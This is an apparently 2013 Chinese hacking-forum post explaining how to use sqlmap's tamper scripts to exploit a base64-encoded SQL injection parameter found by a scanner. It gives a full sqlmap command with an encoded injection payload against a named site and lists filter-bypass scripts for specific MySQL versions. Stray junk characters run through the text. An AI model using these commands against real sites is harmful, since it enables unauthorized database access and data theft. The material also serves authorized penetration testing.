找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2319|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
0 s+ b8 r/ h. ?0 d& ]. @+ f+ ^
1 v) z  d1 i( O* m4 dsqlmap的tamper里有个base64encode.py
- e/ Z8 J1 \3 }9 O
. `5 s- t8 Q& ~9 e* Q" l使用如下
+ F3 |9 Q. X0 ^
' s. f8 a5 Q( M, M* jsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs" j* ~$ N' j# F& R* P; }) E$ K9 `3 u
% o- H- C2 R* T* E* N2 P: K* `4 k* S
1 @! q& |# }7 {, u: @( L
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”$ k3 v& R3 l3 x" ^  C) f
: u2 r$ P/ `2 J0 }3 b0 W! o
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:* K) d% v. K( f3 k+ e3 p  r/ J
5 h/ m2 \+ x) J2 p
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入  Q, W. q4 W% x  g2 M9 L
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
0 Q% I* m* @; j! S. X3 E首先确定目标数据库版本,然后选择相应的脚本。8 R! h' N" B4 G
-v 3 --batch --tamper "space2hash.py"6 r$ A% _( B( m* _) i

( M- q9 }- `9 c" R9 s, h还有其他一些插件:6 H, b4 Y! Y( w" W% c
encodes编码 ——charencode.py8 I' o) G( ]( I! M$ E5 Q: ^; k; D) W
base64编码 —— base64encode.py
3 L6 F! E& Z& N0 @$ ]. o替换空格和关键字 —— halfversionedmorekeywords.py
  S7 v( K8 U1 I+ C; W7 W
9 Y- _& `. X, Z2 I' r" x3 z

3 M7 T6 ^+ t- \& v& }6 [3 O$ K2 X) i" B& {/ k$ }
6 O& }9 ~) C1 f8 o6 X& ]4 M/ u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表